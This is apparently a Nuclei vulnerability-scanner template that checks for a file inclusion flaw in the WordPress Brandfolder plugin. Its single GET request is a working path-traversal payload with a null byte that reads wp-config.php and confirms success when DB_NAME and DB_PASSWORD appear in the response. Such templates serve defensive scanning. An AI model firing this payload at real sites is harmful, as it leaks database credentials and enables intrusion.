id: brandfolder-lfi

info:
  name: Wordpress Brandfolder - Remote/Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content.
  reference:
    - https://www.exploit-db.com/exploits/39591
    - https://cxsecurity.com/issue/WLB-2016030120
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,rfi,edb,wordpress,wp-plugin

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200

# digest: 490a00463044022047b4e023f5613129cd663d52cc86b6757e4f3e545d382143cffa1662b97bf47e02206e6136fc91d0e92024ea2e2ad7cab8fd45c6071901dc880c179c0ba09d449327:922c64590222798bb761d5b6d8e72950
